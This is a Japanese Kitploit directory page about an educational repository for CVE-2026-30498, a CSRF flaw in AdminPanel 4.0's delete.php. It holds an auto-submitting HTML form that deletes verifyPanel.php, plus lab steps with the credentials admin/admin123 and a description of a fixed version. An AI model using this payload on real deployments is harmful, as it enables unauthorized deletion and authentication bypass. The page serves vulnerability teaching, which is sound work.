Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育ラボと実践
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

教育用のCSRF脆弱性デモンストレーションで、管理されたラボ環境を備え、概念実証エクスプロイトと、適切なCSRF対策を施した修正版を含みます。

リポジトリを見る
115ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-30498 – CSRF 脆弱性(AdminPanel 4.0)


概要

CVE ID: CVE-2026-30498 (MITRE により予約済み)
発見者: Mehdi Ben Hamou

AdminPanel 4.0 の delete.php エンドポイントに クロスサイトリクエストフォージェリ(CSRF) 脆弱性が存在します。

この脆弱性により、攻撃者は認証済みユーザーの同意なしに、そのユーザーに代わって機密性の高い操作(ファイル削除)を実行できます。


技術的詳細

この脆弱性は、CSRF 対策の欠如に起因します:

  • CSRF トークンの検証なし
  • Origin / Referer の検証なし
  • GET リクエスト を介して公開される機密性の高い操作
  • ユーザーの意図の確認なし

脆弱なエンドポイントは、リクエストの発信元を検証せずに、ユーザーセッションに基づいてリクエストを直接処理します。


影響

悪用に成功すると、以下が発生します:

  • verifyPanel.php の削除
  • 認証バイパス
  • アプリケーションがセットアップモードに移行
  • システム全体の再初期化が可能

影響を受けるバージョン

  • AdminPanel 4.0 以前 (アーカイブ済みプロジェクト)

攻撃シナリオ

攻撃者は、偽造リクエストを送信する悪意のある Web ページをホストします:

root@kitploit:~
http://localhost:8080/delete.php?file=verifyPanel.php

被害者(認証済みユーザー)がこのページにアクセスすると、ブラウザが自動的にセッション Cookie を含め、リクエストが実行されます。


概念実証(PoC)

悪意のあるページ(攻撃者)

root@kitploit:~
<form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
  <input type="hidden" name="file" value="verifyPanel.php">
</form>
<script>
  document.getElementById("csrfForm").submit();
</script>

このリクエストは、被害者のセッション Cookie とともに自動的に送信されます。


再現手順

  1. 被害者サーバーを起動します:
root@kitploit:~
php -S localhost:8080
  1. ログインページにアクセスします:
root@kitploit:~
http://localhost:8080
  1. 以下でログインします:
root@kitploit:~
admin / admin123
  1. 攻撃者ページを開きます:
root@kitploit:~
http://localhost:8081/evil.html
  1. CSRF 攻撃を実行します
  2. ダッシュボードに戻ります:
root@kitploit:~
/panel/dashboard.php

内部で発生する処理

  1. 被害者がログイン → セッション Cookie が作成される
  2. 攻撃者ページが偽造リクエストを送信
  3. ブラウザが自動的に Cookie を添付
  4. サーバーが検証なしで削除を実行
  5. システムが認証ファイルの欠落を検出
  6. アプリケーションがセットアップモードに移行

ラボ環境(教育用シミュレーション)

このリポジトリには、脆弱性を安全に再現するための管理されたラボ環境が含まれています。

重要: このラボはシミュレーションであり、元の AdminPanel コードベースを正確に再現したものではありません。

ラボのリセット

環境をリセットするには:

root@kitploit:~
/reset.php

修正版(緩和策)

安全なバージョンは以下に実装されています:

root@kitploit:~
delete_fixed.php

追加された保護:

  • ✅ CSRF トークン検証
  • ✅ POST メソッドのみ
  • ✅ Origin / Referer 検証
  • ✅ セッション検証

修正が機能する理由

  • 攻撃者は CSRF トークンにアクセスできない(同一オリジンポリシー)
  • 偽造リクエストには有効なトークンがない → 拒否される
  • Origin チェックによりクロスオリジンリクエストがブロックされる

プロジェクト構成

root@kitploit:~
victim/
├── index.php
├── delete.php
├── delete_fixed.php
├── reset.php
└── panel/
    └── dashboard.php

attacker/
└── evil.html

免責事項

このプロジェクトは教育および研究目的のみを意図しています。
適切な許可なしに、この脆弱性をシステムに対して使用しないでください。

ツールをダウンロード